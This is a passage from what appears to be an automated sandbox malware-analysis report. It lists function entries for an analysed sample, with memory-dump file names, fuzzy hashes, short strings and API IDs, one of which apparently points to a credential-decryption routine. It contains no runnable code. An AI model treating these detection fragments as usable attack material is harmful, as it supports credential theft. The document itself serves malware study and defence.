                                  • LocalAlloc.KERNEL32(00000040,00000000), ref: 007EA2F3
                                  • LocalFree.KERNEL32(?), ref: 007EA323
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                  • Associated: 00000000.00000002.2106325290.00000000007E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000929000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000AB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000ACA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106831019.0000000000D67000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106944924.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106959064.0000000000EFF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Local$AllocCryptDataFreeUnprotect
                                  • String ID:
                                  • API String ID: 2068576380-0
                                  • Opcode ID: 0f0c5cb8b73372eb2cec1ae0b561200d523098c8b934bc87158e7bd03708d0e2
                                  • Instruction ID: cfb60a16f8cba902d8df661963d6653b2725c8827bf4243d418a8cf24100ab69
                                  • Opcode Fuzzy Hash: 0f0c5cb8b73372eb2cec1ae0b561200d523098c8b934bc87158e7bd03708d0e2
                                  • Instruction Fuzzy Hash: 0D11F7B8A00209EFCB04DFA8D884AAEB7B5FF88300F104559ED15A7390D770AE51CF61
                                  Function 00C3A802 Relevance: 4.2, Strings: 2, Instructions: 1674COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106543234.0000000000ACA000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                  • Associated: 00000000.00000002.2106325290.00000000007E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000929000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000AB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106831019.0000000000D67000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106944924.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106959064.0000000000EFF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: ;('~$~oU
                                  • API String ID: 0-366036938
                                  • Opcode ID: 1854da225b1ea1501523fd54fb7abd7d3ac9e8a8db208a70f6059799755644a9
                                  • Instruction ID: 161f4f022f285657a60d6998e7dc0674db64106af90b89626df5dd0d38a24549
                                  • Opcode Fuzzy Hash: 1854da225b1ea1501523fd54fb7abd7d3ac9e8a8db208a70f6059799755644a9
                                  • Instruction Fuzzy Hash: 76B238F3A0C2109FE304AE2DEC8567AFBE5EF94720F16453EEAC5C3744E93558048696
                                  Function 00C3C39B Relevance: 4.1, Strings: 2, Instructions: 1602COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106543234.0000000000ACA000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                  • Associated: 00000000.00000002.2106325290.00000000007E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000929000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000AB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106831019.0000000000D67000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106944924.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106959064.0000000000EFF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: .|}$x
                                  • API String ID: 0-838600425
                                  • Opcode ID: cd6ad6d59e7df0ed13803bc7cf0f3b4daf6719df5930ba94bf1d9d906a8d875f
                                  • Instruction ID: 396a8fc5c3eb2561860fead174c5fc925d4cb0f40e7875800da2eb5d390bc290
                                  • Opcode Fuzzy Hash: cd6ad6d59e7df0ed13803bc7cf0f3b4daf6719df5930ba94bf1d9d906a8d875f
                                  • Instruction Fuzzy Hash: AEB216F360C2149FE304AE2DEC8567AFBE9EF94320F1A453DEAC4C7744EA3558058696
                                  Function 00854BA8 Relevance: 3.4, Strings: 2, Instructions: 941COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                  • Associated: 00000000.00000002.2106325290.00000000007E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000929000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000AB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000ACA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106831019.0000000000D67000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106944924.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106959064.0000000000EFF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: ?$__ZN
                                  • API String ID: 0-1427190319
                                  • Opcode ID: 5979ebcfade6a94da10809392b5ca83137eebb76b9c6aa0d0269130114abb242
                                  • Instruction ID: 3fb4733484638f9ca7171a66c9ed0e0245ff1e7b5b609aa79861b86777660da2
                                  • Opcode Fuzzy Hash: 5979ebcfade6a94da10809392b5ca83137eebb76b9c6aa0d0269130114abb242
                                  • Instruction Fuzzy Hash: E9724572908B509BC714CF18C8A066ABBE2FFD5316F598A1DFC95DB291D370DC498B82
                                  Function 00835DB9 Relevance: 2.5, Strings: 1, Instructions: 1234COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                  • Associated: 00000000.00000002.2106325290.00000000007E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000929000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000AB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000ACA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106831019.0000000000D67000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106944924.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106959064.0000000000EFF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: xn--
                                  • API String ID: 0-2826155999
                                  • Opcode ID: 7df6ecad3ed0aeae1596bd114aa1f7039c484854ff8b1381d6cb73b44afb5762
                                  • Instruction ID: ec4fcbe2a22201370949457417b1a72f9fc891f3e8695a58efad722fd88983ac
                                  • Opcode Fuzzy Hash: 7df6ecad3ed0aeae1596bd114aa1f7039c484854ff8b1381d6cb73b44afb5762
                                  • Instruction Fuzzy Hash: 9CA227B1C042689ADF18CB5CC8A13FDB7B1FF85300F1882AAD456BB281E7755E95CB91
                                  Function 00834DC8 Relevance: 1.9, APIs: 1, Instructions: 411COMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                  • Associated: 00000000.00000002.2106325290.00000000007E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000929000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000AB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000ACA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106831019.0000000000D67000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106944924.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106959064.0000000000EFF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: __aulldiv
                                  • String ID:
                                  • API String ID: 3732870572-0
                                  • Opcode ID: c14b47d2e213c3a0e8374cf111387a659401d06af651524ed7eee9bee9842815
                                  • Instruction ID: f0b81fc4267b461fcbcecd25c317d9d5b1934a9e21d1104c9777592afaad3cb2
                                  • Opcode Fuzzy Hash: c14b47d2e213c3a0e8374cf111387a659401d06af651524ed7eee9bee9842815
                                  • Instruction Fuzzy Hash: 35E1BD316087459FC724DE28C8907AEB7E2FFC9304F59492DE4D9DB291DA31A845CBC2
                                  Function 00834868 Relevance: 1.9, APIs: 1, Instructions: 400COMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                  • Associated: 00000000.00000002.2106325290.00000000007E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000929000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000AB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000ACA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106831019.0000000000D67000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106944924.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106959064.0000000000EFF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: __aulldiv
                                  • String ID:
                                  • API String ID: 3732870572-0
                                  • Opcode ID: 83317d89dfdf25b5cbfc261f48c526b848a7f8a57d589ef9335097789b789f81
                                  • Instruction ID: 731e463981a4a73ad97cd0905c3a1ecb15fd429ce5a6d3a1b4185bfd9d6016b8
                                  • Opcode Fuzzy Hash: 83317d89dfdf25b5cbfc261f48c526b848a7f8a57d589ef9335097789b789f81
                                  • Instruction Fuzzy Hash: 8FE1B131A083159FCB24CE18C8817AEB7E6FFC5314F15992DE99ADB251DB30EC458B86
                                  Function 0084E258 Relevance: 1.6, Strings: 1, Instructions: 383COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                  • Associated: 00000000.00000002.2106325290.00000000007E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000929000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000AB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000ACA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106831019.0000000000D67000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106944924.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106959064.0000000000EFF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: UNC\
                                  • API String ID: 0-505053535
                                  • Opcode ID: f944912daca86eef5da2b02659a6c861781d9d5d66b239bded02d895f8a825b7
                                  • Instruction ID: 82af317c14c1a4fd365f6e8330ca181d5d254a74451a6af74c738ebd25886a8f
                                  • Opcode Fuzzy Hash: f944912daca86eef5da2b02659a6c861781d9d5d66b239bded02d895f8a825b7
                                  • Instruction Fuzzy Hash: 03E14E71D0466D8FEB10CF18C8843BEBBE2FB95318F1A8169D4A4DB292D7758D46CB90
                                  Function 00C09E64 Relevance: 1.5, Strings: 1, Instructions: 254COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106543234.0000000000ACA000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                  • Associated: 00000000.00000002.2106325290.00000000007E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000929000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000AB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106831019.0000000000D67000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106944924.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106959064.0000000000EFF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: ~/'
                                  • API String ID: 0-1996814362
                                  • Opcode ID: e30d8734fe46028dd42bb8d14a0694442512ce8cdd4cb6c6e898b15b0ca90bb4
                                  • Instruction ID: 16a1c8b6fcc61a8d2ab65a5da138decf645c8b8aa7bbb0782a6d17dd633670bb
                                  • Opcode Fuzzy Hash: e30d8734fe46028dd42bb8d14a0694442512ce8cdd4cb6c6e898b15b0ca90bb4
                                  • Instruction Fuzzy Hash: 2F8129F3E082005BF3086E29DC9577ABAD5DB94321F1B463DDBC4877C4E97918018696
                                  Function 00BC83A4 Relevance: 1.5, Strings: 1, Instructions: 216COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106543234.0000000000ACA000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                  • Associated: 00000000.00000002.2106325290.00000000007E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000929000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000AB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106831019.0000000000D67000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106944924.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106959064.0000000000EFF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: ?o
                                  • API String ID: 0-3900432946
                                  • Opcode ID: 5c6677af9dfe8e831bfbe7410a54cdccf5b5ee5b876358cd3b40e888c582ec8e
                                  • Instruction ID: 7f5da385981c0bde8511eaf8c7667e15bfea7351b5a9947bec9bb1da01ebfdfd
                                  • Opcode Fuzzy Hash: 5c6677af9dfe8e831bfbe7410a54cdccf5b5ee5b876358cd3b40e888c582ec8e
                                  • Instruction Fuzzy Hash: 615147F3E082249BE310692DDC457AAB7DADB94730F1B463DEEC897784E5369C0182C6
                                  Function 00D50470 Relevance: 1.4, Strings: 1, Instructions: 137COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106543234.0000000000D50000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                  • Associated: 00000000.00000002.2106325290.00000000007E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000929000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000AB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000ACA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106831019.0000000000D67000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106944924.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106959064.0000000000EFF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: Js?
                                  • API String ID: 0-3827699304
                                  • Opcode ID: c25775bb14811b7a6d8cd760082c3561932ca366adb3760bd00ccdb8a4160bd9
                                  • Instruction ID: ba94e9a432d2ba58a6ca878e86a274f5eeae577832431e2f581c213277250515
                                  • Opcode Fuzzy Hash: c25775bb14811b7a6d8cd760082c3561932ca366adb3760bd00ccdb8a4160bd9
                                  • Instruction Fuzzy Hash: 1D4128F35082049FE714AE29EC41767B7D9EF94320F29852DEAC4C3790F939D805869A
                                  Function 00D4420C Relevance: 1.3, Strings: 1, Instructions: 78COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106543234.0000000000D2E000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                  • Associated: 00000000.00000002.2106325290.00000000007E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000929000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000AB6000.00000040.00000001.01000000.00000003.sdmpDownload File
